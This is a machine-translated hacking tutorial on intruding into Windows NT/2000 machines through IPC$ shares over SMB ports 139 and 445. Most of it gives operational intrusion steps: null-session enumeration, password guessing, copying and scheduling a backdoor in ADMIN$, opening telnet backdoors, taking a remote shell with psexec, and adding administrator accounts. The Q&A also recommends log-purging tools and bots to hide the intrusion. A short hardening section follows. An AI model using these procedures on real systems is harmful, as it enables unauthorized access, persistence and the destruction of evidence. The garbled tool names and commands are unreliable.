Port 445 intrusion details

Port 445 intrusion details
About port 445 intrusion
Port 445 intrusion details
Search for more information about port 445 intrusion on this site

Port 445 intrusion. Before that, we should first look at port 445 as the intrusion port. Why?
Port 445 is the default port of the IPC service.
IPC $
Summary
2. What is IPC $
3. What is an empty session?
What can a four-Null Session do?
Five IPC $ port used
Significance of six IPC pipelines in hack attacks
Seven IPC $ common causes of connection failure
8. Reasons for file copy failure
IX limitations on the AT command and XP on IPC $
10. How to enable the target IPC $ sharing and other sharing?
Eleven commands that require Shell
Commands that may be used during the 12th intrusion
Comparison between past and current IPC $ intrusion
14. How to Prevent IPC $ intrusion
15 IPC $ featured intrusion Q &
End of 16th
Summary
The online articles on IPC $ intrusion can be said to be cool, and the attack steps have even become a solid model. Therefore, no one wants to take things that have become a norm and play around with them. However, in this case, I think these articles are not detailed, and some content is even incorrect. As a result, questions about IPC $ account for almost half of the discussion areas of major security forums, in addition, these problems are often repeated, seriously affecting the quality and learning efficiency of the Forum. Therefore, I have summarized this article and hope to make it as clear as possible.
Note: All the situations discussed in this article occur in the Windows NT/2000 environment by default, and Win98 will not be discussed here.
2. What is IPC $
IPC $ (Internet process connection) is a resource that shares "named pipes". It is a named pipe open for inter-process communication. By providing a trusted user name and password, both parties can establish a secure channel and exchange encrypted data through this channel to access remote computers. IPC $ is a new feature of NT/2000. It has a feature that only one connection can be established between two IP addresses at the same time. NT/2000 provides the IPC $ function and enables default sharing when installing the system for the first time, that is, all logical sharing (C $, d $, e $ ...... ) And the system directory winnt or Windows (ADMIN $. All of these, Microsoft's original intention is to facilitate administrator management, but intentionally or unintentionally, leading to a reduction in system security.
We often hear people talking about the IPC $ vulnerability and IPC $ vulnerability. In fact, IPC $ is not a real vulnerability, it must be the 'webshell 'placed by Microsoft itself: Null Session ). So what is an empty session?
3. What is an empty session?
Before introducing null sessions, we need to understand how a secure session is established.
In Windows NT 4.0, a challenge response protocol is used to establish a session with a remote machine. A successful session becomes a secure tunnel through which both parties can communicate information, the general sequence of this process is as follows:
1) The session requestor (customer) transmits a data packet to the session receiver (server) and requests the establishment of a security tunnel;
2) The server generates a random 64-digit number (implementing the Challenge) and transmits it back to the customer;
3) The customer obtains the 64-digit number generated by the server, disconnects it with the password of the account trying to establish a session, and returns the result to the server (for response );
4) The server receives the response and sends it to the local security authentication (LSA). lsa verifies the response by using the correct password of the user to confirm the identity of the requester. If the requester's account is the local account of the server, verify that the local account has occurred. If the requested account is a domain account, the response is sent to the domain controller for verification. When the response to the challenge is verified as correct, an access token is generated and then transmitted to the customer. The customer uses this access token to connect to the resources on the server until the suggested session is terminated.
The above is the general process of establishing a secure session. What about empty sessions?
Empty sessions are Sessions established with the server without trust (that is, no user name or password is provided), but according to the Win2000 access control model, A token is also required to establish a null session. However, a null session is not authenticated by user information during creation. Therefore, this token does not contain user information, this session cannot send encrypted information between systems, but it does not indicate that the token of the empty session does not contain the Security Identifier Sid (which identifies the user and the group). For an empty session, the SID of the token provided by LSA is s-1-5-7. This is the SID of the empty session. The username is Anonymous Logon (This username can be seen in the user list, but it cannot be found in the SAM Database and belongs to the system's built-in account). This access token contains the following disguised group:
Everyone
Network
Under Security policy restrictions, this empty session will be authorized to access all the information authorized to access the above two groups. So what can an empty session be created?
What can a four-Null Session do?
For nt, with the default security settings, you can use a null connection to list users and shares on the target host, share the everyone permission, and access a small portion of the Registry, there is no significant value for use; it is less useful for 2000, because in Windows 2000 and later versions, Only Administrators and Backup Operators have the right to access the registry from the network by default, and it is not convenient to implement it, tools are required.
From this we can see that this untrusted session is not very useful, but from a complete IPC $ intrusion, empty sessions are an indispensable stepping stone, because we can get the user list from it, and most weak password scanning tools use this user list to guess the password, successfully exported user lists greatly increase the guess success rate. This alone is sufficient to indicate the security risks caused by empty sessions, therefore, null sessions are useless. The following are some specific commands that can be used in an empty session:
1 first, create an empty SESSION (of course, this requires the objective to open IPC $)
Command: net use \ IP \ IPC $ ""/User :""
Note: The preceding command contains four spaces. There is a space between net and use, one after use, and one between the left and right sides of the password.
2. view the shared resources of the remote host
Command: Net view \ IP
Explanation: The premise is that after an empty connection is established, you can use this command to view the shared resources of the remote host. If shared resources are enabled, you can obtain the following results, however, this command cannot display the default share.
Share resources in \ *. *
Resource Sharing name type usage comment
-----------------------------------------------------------
Netlogon disk Logon Server share
Sysvol disk Logon Server share
The command is successfully completed.
3. view the current time of the remote host
Command: Net time \ IP
Explanation: You can use this command to obtain the current time of a remote host.
4. Obtain the NetBIOS username list of the remote host (you need to enable your NBT)
Command: NBTSTAT-A IP
Run the following command to obtain the NetBIOS username list of the remote host:
Node IPaddress: [*. *] scope ID: []
NetBIOS remote machine name table
Name type status
---------------------------------------------
Server <00> unique registered
OYAMANISHI-H <00> group registered
OYAMANISHI-H <1C> group registered
Server <20> unique registered
OYAMANISHI-H <1B> unique registered
OYAMANISHI-H <1E> group registered
Server <03> unique registered
OYAMANISHI-H <1D> unique registered
. _ Msbrowse _. <01> group registered
Inet ~ Services <1C> group registered
Is ~ Server... <00> unique registered
MAC address = 00-50-8b-9A-2d-37
The above is what we often use empty sessions to do. It seems that we can also get a lot of things, but note that the operations for establishing an IPC $ connection will leave a record in the event log, whether or not you have successfully logged on. Well, let's take a look at the port used by IPC $?
Five IPC $ port used
First, let's take a look at some basic knowledge:
1 smbserver Message Block) Windows protocol family, used for file printing and sharing services;
2 nbtnetbios over TCP/IP) use port 137 (UDP) 138 (UDP) 139 (TCP) to implement NetBIOS network interconnection based on TCP/IP protocol.
3. In WindowsNT, SMB is implemented based on NBT, that is, port 139 (TCP) is used. In Windows2000, SMB is implemented based on NBT and port 445.
With these basic knowledge, we can further discuss the port selection for access network sharing:
For the Win2000 client (initiator:
1. If NBT is allowed to connect to the server, the client tries to access ports 139 and 445 at the same time. If port 445 has a response, the client sends an RST packet to port 139 to disconnect, when port 455 is used for a session, port 445 is used only when port 139 does not respond. If neither port responds, the session fails;
2. If NBT is prohibited from connecting to the server, the client only attempts to access port 445. If port 445 does not respond, the session fails.
For the Win2000 Server:
1 If NBT is allowed, UDP port 137,138 and TCP port 139,445 will be open (Listening );
2. If NBT is disabled, only port 445 is enabled.
Our IPC $ session port selection also complies with the above principles. Obviously, if the remote server does not listen to port 139 or port 445, the IPC $ session cannot be established.
Significance of six IPC pipelines in hack attacks
The IPC pipeline was originally designed by Microsoft to facilitate remote management by administrators, but it seems easier for intruders to open the IPC pipeline to hosts. Through the IPC pipeline, We can remotely call some system functions (mostly implemented through tools, but corresponding permissions are required), which is often the key to the success or failure of intrusion. Without such considerations, the IPC pipeline has provided great support to intruders and even become the most important means of transmission, therefore, you can always see some friends on major forums who cannot open the IPC pipeline of the target machine, but cannot help. Of course, we cannot ignore the important role that permissions play in the IPC pipeline. You must have tasted the embarrassment of empty sessions. If you do not have the permissions, you cannot start the pipeline. However, once an intruder has the administrator privilege, the IPC pipeline will display the side of the vulnerability.
Seven IPC $ common causes of connection failure
The following are some common causes of connection failure of IPC $:
1 IPC connection is a special function in Windows NT and above. Because it needs to use many DLL Functions in Windows NT, it cannot be run in Windows 9.x/ me, that is to say, only NT/2000/XP can establish an IPC $ connection to each other, while 98/Me cannot establish an IPC $ connection;
2 If you want to successfully establish an IPC $ connection, you need the responder to enable IPC $ sharing, even if it is a null connection. If the responder closes IPC $ sharing, a connection cannot be established;
3. The connection initiator has not started the lanmanworkstation Service (display name: workstation): it provides network link and communication, and the initiator cannot initiate connection requests without it;
4. the responder has not started the LanmanServer Service (display name: Server): it provides RPC support, file, printing, and named pipe sharing. IPC $ depends on this service, without it, the host cannot respond to the initiator's connection request, but without it, it can still initiate an IPC $ connection;
5. the responder has not enabled netlogon. It supports the pass-through account logon identity on the computer on the Network (but this does not seem to happen );
6. The 139,445 port of the responder is not listening or blocked by the firewall;
7. The initiator has not opened port 139,445;
8. Incorrect username or password: if such an error occurs, the system will prompt you an error similar to 'unable to update password' (this error is obviously excluded from empty sessions );
9 command input error: there may be more or less space. When the user name and password do not contain space, double quotation marks on both sides can be omitted. If the password is empty, you can directly enter two quotation marks;
10 if the other party restarts the computer after a connection is established, the IPC $ connection will be automatically disconnected and the connection needs to be established again.
In addition, you can analyze the cause based on the returned error number:
Error 5: Access Denied: the user you are using is probably not the administrator privilege;
Error No. 51. The network path cannot be found in Windows: The network is faulty;
Error No. 53, network path not found: IP address error; target not on; Target LanmanServer service not started; Target firewall (Port filter );
Error No. 67. network name not found: Your lanmanworkstation service is not started or the target has deleted IPC $;
Error 1219: The creden provided conflict with the existing creden set: You have already created an IPC $ with the other party. Please delete and reconnect;
Error Code 1326, unknown user name or wrong password: The cause is obvious;
Error Code 1792: attempted to log on, but the network login service was not started: the target netlogon service was not started;
Error Code 2242: the password of this user has expired: The target has an account policy, and the password must be changed periodically.
8. Reasons for file copy failure
Some of my friends have successfully established an IPC $ connection, but they have encountered such a problem during copy and cannot be copied successfully. What are the common causes of replication failure?
1. the recipient has not enabled the shared folder.
This type of error occurs most, accounting for more than 50%. After the IPC $ connection is established successfully, many friends do not even know whether the other party has a shared folder, so they perform blind replication. As a result, the replication fails and is very depressing. Therefore, we recommend that you use the netview \ ip command to check whether the shared folder you want to copy exists (it is better to use the software) before copying ), do not think that shared folders exist if you can establish an IPC $ connection.
2. failed to share with default
This type of errors is also common and involves two major aspects:
1) The default share must be enabled for the host that can establish the IPC $ connection. Therefore, the default share must be enabled for the host immediately after the connection is established to C $, d $, default shared copy files, such as ADMIN $, fail to be copied once the default share is not enabled. The successful connection of IPC $ indicates that the Peer has enabled IPC $ sharing, but does not indicate that the default sharing exists. IPC $ sharing and default sharing are two things. IPC $ sharing is a named pipe, which is not an actual folder. By default, sharing is actually a shared folder;
2) because the net view \ ip command cannot display the default shared folder (because the default shared folder has $), we cannot determine whether the default shared folder is enabled by the other party, therefore, if the default share is not enabled, all operations performed on the default share cannot be successful. (However, most scanning software can scan the default share directory while weak passwords are being scanned, can avoid such errors)
Key points: please be sure to distinguish between IPC sharing and default sharing. The difference between normal sharing and IPC sharing is that IPC sharing is a pipe rather than a shared folder; by default, shared folders are opened by default during installation. Common Shared Folders are shared folders that can be set by ourselves.
3. Insufficient user permissions, including:
1) When an empty connection is replicated to all shares (default share and normal share), permissions are insufficient;
2) When you share a copy with default, in Win2000 pro, only members of the Administrators and Backup Operators groups can access these shared directories in the server operatros group of Win2000 Server;
3) When copying data to a common shared object, you must have the corresponding permissions (that is, the access permissions set in advance by the other administrator );
4) the other party can prohibit external access sharing through firewall or security software settings;
Note:
1. Do not think that the Administrator must have the Administrator permission. The Administrator name can be changed.
2. The administrator can access the shared folders by default, but not necessarily normal shared folders, because the administrator can set the access permissions for shared folders. 6, the administrator sets the access permission for drive d to allow only users named xinxin to access this folder completely. In this case, even if you have the Administrator permission, you still cannot access drive D. However, if the owner has enabled the default share function of d $, you can access d $ to bypass the permission restriction. If you are interested, you can perform the test on your own.
4 killed by the firewall or on the LAN
Another case is that your copy operation may have been successful, but the firewall will kill the operation while the system is running, and the file cannot be found; or you copy the Trojan horse to the host in the LAN, causing connection failure (this is not the case for reverse connection Trojans ). If you don't think of this situation, you will think that there is a problem with the replication, but the actual copy operation has been successful, but there is a problem during the running.
Well, you know that there will be various problems in the actual operation of the IPC $ connection. What I have summarized above is some common errors that I did not mention, you can give me a reminder.
IX limitations on the AT command and XP on IPC $
I would also like to explain the cause of the remote running of the program with at, but considering the low success rate of AT, there are also many problems, I will not mention it here (the more I mention, the more people you use), but we recommend that you use mongoxec.exe to remotely run the program. If you want to remotely execute the local c: \ xinxin.exe file, the Administrator is administrator, and the password is 1234, enter the following command:
Export xec \ IP-u administrator-P 1234-C: \ xinxin.exe
If an IPC connection has been established, the-u-p parameter is not required. mongoxec.exe automatically copies the file to a remote machine and runs it.
Originally, I didn't want to discuss IPC $ in XP here. I wanted to discuss it separately, but I saw more and more friends eager to ask why most operations were hard to succeed when I encountered XP. Here is a simple example. In XP's default security options, any remote access is granted only the guest permission, that is, even if you use the Administrator account and password, the permissions you get are only guest. Therefore, most operations fail because of insufficient permissions. So far, there is no good way to break through this restriction. So if you really get the XP Administrator password, I suggest you try to avoid the IPC pipeline.
10. How to enable the target IPC $ sharing and other sharing?
The target IPC $ cannot be opened easily, otherwise the world will be disrupted. You need a shell with the admin permission, such as telnet, Trojan, and CMD redirection, and then run the following command in shell:
NET Share IPC $
Open the target IPC $ sharing;
NET Share IPC $/del
Disable the target IPC $ share. If you want to open a shared folder for it, you can use:
NET Share xinxin = c :\
In this way, the shared C drive is opened as the xinxin shared folder. (However, I found many people mistakenly think that the command to open a shared folder is net share C $, and it is really a mistake to give a little reference to cainiao ). Again, these operations can only be implemented in shell.
Eleven commands that require Shell
I can see that many tutorials are not accurate in this aspect. Some commands that require shell to complete are simply executed under the IPC $ connection, which is misleading. Next I will summarize the commands that need to be completed in shell:
1. Create a user to the remote host, activate the user, and modify the user password. The operations to join the management group must be completed in shell;
2. Enable IPC $ sharing for the remote host, which is shared by default. Common sharing operations must be completed in shell;
3. Run or close the remote host service in shell;
4. The process of starting/killing the remote host also needs to be completed in Shell (except in the case of software, such as pskill ).
Commands that may be used during the 12th intrusion
For the integrity of this tutorial, I have listed some common commands in the IPC $ intrusion. If you have mastered these commands, you can skip this section and read the following content. Note that these commands are applicable to local or remote hosts. If they are applicable only to local hosts, you can only execute them to remote hosts after obtaining the shell (such as cmd and telnet) of the remote host.
1. Create/delete an IPC $ connection command
1) Create an empty connection:
Net use \ 127.0.0.1 \ IPC $ ""/User :""
2) establish a non-empty connection:
Net use \ 127.0.0.1 \ IPC $ "password"/User: "User Name"
3) delete a connection:
Net use \ 127.0.0.1 \ IPC $/del
2. Operation commands for remote hosts in the IPC $ connection
1) view the shared resources of the remote host (default share is not displayed ):
Net view \ 127.0.0.1
2) view the current time of the remote host:
Net time \ 127.0.0.1
3) obtain the NetBIOS username list for the remote host:
NBTSTAT-A 127.0.0.1
4) ing/deleting Remote sharing:
Net use Z: \ 127.0.0.1 \ c
This command maps the shared resource named C to a local Z disk.
Net use Z:/del
Delete the mapped Z disk, other disks, and so on.
5) copy files to the remote host:
Copy path \ file name \ IP \ shared directory name, for example:
Copy c: \ xinxin.exe \ 127.0.0.1 \ C $ copy the xinxin.exe under drive C to the other C
Of course, you can also copy the files on the remote host to your machine:
Copy \ 127.0.0.1 \ C $ \ xinxin.exe c :\
6) Add a scheduled task remotely:
At \ IP time program name:
At \ 127.0.0.0 11: 00 xinxin.exe
Note: Try to use the 24-hour time. If the program you plan to run is in the default system search path (such as system32/), you do not need to add a path; otherwise, you must add a full path.
3 local commands
1) view the shared resources of the local host (you can see the local default share)
NET Share
2) obtain the user list of the local host
Net user
3) display the account information of a local user
Net user account name
4) displays the services currently started by the local host.
Net start
5) Start/Close local services
Net start service name
Net stop service name
6) add an account locally
Net user account name password/Add
7) Activate disabled users
Net uesr account name/active: Yes
8) join the Administrator Group
Net localgroup Administrators account name/Add
Obviously, although these are all local commands, if you enter these commands in the remote host shell, for example, after telnet is successful, then these local inputs will apply to the remote host.
4. Other commands
1) Telnet
Telnet IP Port
Telnet 127.0.0.0 23
2) use opentelnet.exe to enable telnet for the remote host.
Opentelnet.exe \ IP Administrator account password NTLM authentication Port
Opentelnet.exe \ 127.0.0.1 administrator "" 1 90
However, this tool must meet four requirements:
1) IPC $ sharing is enabled for the target.
2) You must have an administrator password and an account.
3) if the target enables the RemoteRegistry service, you can change the NTLM authentication.
4) valid only for Win2k/XP
3) Use cmdxec.exe to obtain the shell in one step. Support for IPC pipelines is required.
Unzip xec.exe \ IP-u Administrator Account-P password cmd
Export xec.exe \ 127.0.0.1-u administrator-P "" cmd
Comparison between past and current IPC $ intrusion
Since it is a comparison, I will first write the previous IPC $ intrusion steps to everyone, which is a classic step:
[1]
C: \> net use \ 127.0.0.1 \ IPC $ "/User: admintitrators
\ Use a blank password to establish a connection
[2]
C: \> net view \ 127.0.0.1
\ View remote shared resources
[3]
C: \> copy srv.exe \ 127.0.0.1 \ ADMIN $ \ System32
\ Copy the one-time backdoor srv.exe to the target system folder, provided that the ADMIN $ function is enabled.
[4]
C: \> net time \ 127.0.0.1
\ View the current time of the remote host
[5]
C: \> at \ 127.0.0.1 time srv.exe
\ Use the AT command to remotely run srv.exe. The other party needs to enable the 'Task schedout' service.
[6]
C: \> net time \ 127.0.0.1
\ Check the current time again to estimate whether srv.exe is running. This step can be omitted
[7]
C: \> Telnet 127.0.0.1 99
\ Open a new window and remotely log on to 127.0.0.1 via Telnet to obtain a shell (what does Shell mean? Then you can think of it as the control of the remote machine, the operation is like DOS), port 99 is the one-time backdoor port opened by srv.exe
[8]
C: \ winnt \ system32> Net start Telnet
\ We started the telnet service for the remote machine in the shell we just logged on to. After all, srv.exe is a one-time backdoor and we need a long backdoor for future access, if the peer's telnet has been started, skip this step.
[9]
C: \> copy ntlm.exe \ 127.0.0.1 \ ADMIN $ \ System32
\ Transfer ntlm.exe in the original window. ntlm.exe is used to change the Telnet AUTHENTICATION.
[10]
C: \ winnt \ system32> ntlm.exe
\ Run ntlm.exe in the shell window, and you will be able to telnet the host smoothly.
[11]
C: \> Telnet 127.0.0.1 23
\ Telnet to 127.0.0.1 in the new window, and port 23 can be omitted, so that we can obtain a long-term Backdoor
[12]
C: \ winnt \ system32> net user account name password/Add
C: \ winnt \ system32> net uesr guest/active: Yes
C: \ winnt \ system32> net localgroup Administrators account name/Add
\ After telnet, you can create a new account, activate guest, and add any account to the Administrator group.
Well, I seem to have been back here two or three years ago. At that time, IPC $ was used by everyone, but with the emergence of new tools, some of the tools and commands mentioned above are not commonly used now. Let's take a look at the efficient and simple IPC $ intrusion.
[1]
Unzip xec.exe \ IP-u Administrator Account-P password cmd
\ With this tool, we can get the shell in one step
Opentelnet.exe \ Server administrator account password NTLM Authentication Mode Port
\ You can use it to conveniently change the authentication method and port for telnet, so that we can log on
[2]
There is no second step. After you get the shell in one step, you can do everything. You can use winshell for security backdoors, and use CA for cloning. You can use 3389.vbe for the terminal, win2kpass is used to record passwords. In short, there are a lot of good tools. If you choose one, I will not say much.
14. How to Prevent IPC $ intrusion
1. Disable NULL connections for enumeration (this operation cannot prevent NULL connections from being established)
Run regedit and find the following primary key [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ LSA] to change the key value of restrictanonymous = DWORD to: 1
If it is set to "1", an anonymous user can still connect to IPC $ share, but cannot obtain the permissions to list SAM accounts and share information through this connection; "2" is added to Windows. users who have not obtained the anonymous permission cannot perform an IPC $ null connection. We recommend that you set it to 1. If the preceding primary key does not exist, create a new one and change the key value. If you think it is difficult to change the registry, you can set this item in local security settings: Local Security Settings-local policy-Security Options-'additional restrictions on anonymous connections'
2. Disable default sharing
1) view local shared resources
Run-cmd-enter net share
2) delete a shared object (the shared object still exists by default after it is restarted)
NET Share IPC $/delete
NET Share ADMIN $/delete
NET Share C $/delete
NET Share d $/delete (if E, F ,...... Can continue to delete)
3) Stop the Server Service
Net stop server/Y (the server service will be restarted after the restart)
4) Disable auto enable default share (this operation cannot disable IPC $ share)
Run-Regedit
Server: Find the following primary key [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ LanmanServer \ Parameters] and change the key value of AutoShareServer (DWORD) to 00000000.
Pro: Find the following primary key [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ LanmanServer \ Parameters] and change the key value of autoscaling wks (DWORD) to 00000000.
By default, these two key values do not exist on the host. You need to manually add them. After modification, restart the host to make the settings take effect.
3. Disable IPC $ and the default shared dependency service: Server service.
If you really want to disable IPC $ sharing, disable the Server Service:
Control Panel-Administrative Tools-service-find Server Service (right-click)-properties-General-start type-select Disabled, then a message may be prompted: the xxx service will also disable whether or not to continue, because some secondary services depend on the server service and do not care about it.
4. Mask port 139,445
Without the support of the above two ports, you cannot establish IPC $. Therefore, blocking port 139,445 can also prevent IPC $ intrusion.
1) port 139 can be blocked by disabling NBT
Local Connection-TCP/It properties-advanced-wins-select 'Disable Netbios on TCP/It'
2) port 445 can be blocked by modifying the Registry
Add a key value
Hive: HKEY_LOCAL_MACHINE
Key: System \ ControlSet \ Services \ netbt \ Parameters
Name: smbdeviceenabled
Type: REG_DWORD
Value: 0
Restart the machine after modification.
Note: If the two ports are blocked, you cannot use IPC $ to intrude into others.
3) install a firewall to filter ports
6. Set a complex password to prevent the password from being poorly cited through IPC $. I think this is the best way to enhance security awareness, which is much safer than continuously patching.
15 IPC $ featured intrusion Q &
There are a lot of theoretical things mentioned above, but in practice you will encounter various problems, so in order to give everyone the greatest help, I have sorted out some representative questions and answers from various security forums. Some of the answers are my answers and some are replies from the Forum. If you have any questions, please come and discuss them with me.
1. During the IPC $ intrusion, records will be left on the server. Is there any way to prevent the server from discovering the records?
A: There are some records left. You can use the log purge program to delete the logs after you leave, or use bots to intrude into the logs.
2. You can see why the following information can be connected but cannot be copied.
Net use \ ***. *** \ IPC $ "password"/User: "User Name"
Command successful
Copy icmd.exe \ ***. *** \ ADMIN $
Network path not found
Command failed
A: For problems such as "network path not found" and "network name not found", most of them are because the shared folder you want to copy is not enabled, so an error occurs during replication, you can try to find other shared folders.
3. if the peer has an IPC $ option and can establish a null connection, but the C and D disks require a password, I know that the empty connection does not have many permissions, but is there no other way?
A: It is recommended that you use streamer or other scanning software to guess the password. If you cannot guess the password, you can only give up. After all, empty connections have limited capabilities.
4. I have guessed the administrator password and the IPC $ connection is successful. However, net view \ IP finds that it has not enabled default sharing. What should I do?
A: First, correct one of your mistakes. You cannot see the default share using net view \ IP. You can try copying the file to C $, d $. If none of them work, it means that the default share is disabled. You can use opentelnet.exe or cmdxec.exe.
5. After the IPC $ connection is successful, I used the following command to create an account and found that the account is on my own machine. What is the problem?
Net uset ccbirds/Add
A: The successful establishment of IPC $ only indicates that you have established a communication tunnel with the remote host. It does not mean that you have obtained a shell. Only after obtaining a shell (such as telnet, you can create an account on a remote machine. Otherwise, your operation is performed locally.
6. I have already logged on to a meat machine. I use an administrator account to check the system time, But copying the program to his machine won't work. Every time I say "access is denied, 0 files have been copied. "Is there any service unavailable to the other party? What should I do?
A: In general, "Access Denied" is the result of insufficient permissions. It may be due to a problem with your account, and there is another possibility, if you want to copy a file to a common shared folder, this error is returned, indicating that the folder setting does not include you (even if you are an administrator ), I analyzed this in the previous article.
7. Can I establish an IPC $ connection with the other party using Win98?
A: theoretically, this is not acceptable. We recommend that you use Win2000 for IPC $ operations. using other operating systems will cause a lot of unnecessary trouble.
8. I used net use \ IP \ IPC $ ""/user "to successfully create an empty session, but nbtstat-A IP cannot be used to export the user list. Why?
A: By default, empty sessions can be used to export the user list. However, if the administrator modifies the Registry to disable export, what you said will happen; it is also possible that your NBT is not enabled, and the netstat command is built on NBT.
9. When I establish an IPC $ connection, the following information is returned: 'creden provided conflict with an existing creden set'. What is the problem?
A: You have established an IPC $ connection with the target host. It is not allowed to establish two IPC $ connections between the two hosts.
10. I displayed the following during ing:
F: \> net use H: \ 211.161.134. * \ e $
85 error occurs in the system.
The local device name is in use. What's going on?
A: You are too careless. This indicates that you have an H disk. map it to a drive letter that does not exist!
11. I established a connection F: \> net use \\*. *. *. * \ IPC $ "123"/User: "guest" succeeded, but an error occurred while I mapped. Ask me for a password. Why?
F: \> net use H: \ *. * \ C $
The password is \ *. * \ C $ is invalid.
Enter the password \ *. * \ C $:
System Error 5.
Access denied.
A: Well, I want to ask you for a password, indicating that you are currently using insufficient user permissions and cannot map to C $, which is shared by default. Please try to improve your permissions or find a weak administrator password! The default share usually requires administrator permissions.
12. I scanned a host with port 139 through superscan, but why cannot I leave the connection empty?
A: You have confused the relationship between IPC $ and 139. The host that can connect to IPC $ must have ports 139 or 445 enabled, however, the host that opens these two ports may not be able to connect empty, because the other party can disable IPC $ sharing.
13. Most of the machines in our LAN are xp. I scanned several administrator accounts with a streaming light and the passwords were empty, and they could be connected, but they could not be copied, saying error 5. Why?
A: XP is more secure. In the default settings of the security policy, when you perform identity verification for network logon to a local account, the default permission is guest, even if you log on remotely as an administrator, you only have the guest permission. Therefore, if you copy a file, of course, error 5: the permission is insufficient.
14. I used net use \ 192.168.0.2 \ IPC $ "password"/User: "Administrator", but net use I: \ 192.168.0.2 \ c
Enter the \ 192.168.0.2 password. How can this problem be solved? I am using an administrator? Should everything be accessible?
A: Although you have the Administrator permission, the Administrator may not allow the Administrator to access the C drive when setting the C drive sharing permission (Note: access permission can be set for normal sharing, but not for default sharing, therefore, the above problems may occur.
15. If your machine has disabled IPC $, can I still use IPC $ to connect to another machine? What if Server service is prohibited?
A: If you disable the above two items, you can still initiate an IPC $ connection. However, it would be better to manually test this problem.
16. Can you tell me the cause of the following two errors?
C: \> net time \ 61. 225 .*.*
System Error 5.
Access denied.
C: \> net view \ 61. 225 .*.*
System Error 5.
Access denied.
A: At first, I was puzzled when I encountered this problem. Error 5 indicates that the permission is not enough. However, even the permission for a blank session can be used to complete the above two commands. Why can't he do it? Didn't he establish a connection? Later, the careless Comrade told me that this was indeed the case. He forgot that he had deleted the IPC $ connection, and then he entered the two commands above, with error 5.
17. What's going on?
F: \> net time
The time server cannot be found.
Type net helpmsg 3912 for more help.
A: The answer is very simple. Your command is wrong. It should be net time \ IP.
No IP address is entered. Of course, the server cannot be found. The view command should also have an IP address, that is, net view \ IP

Favorite shared score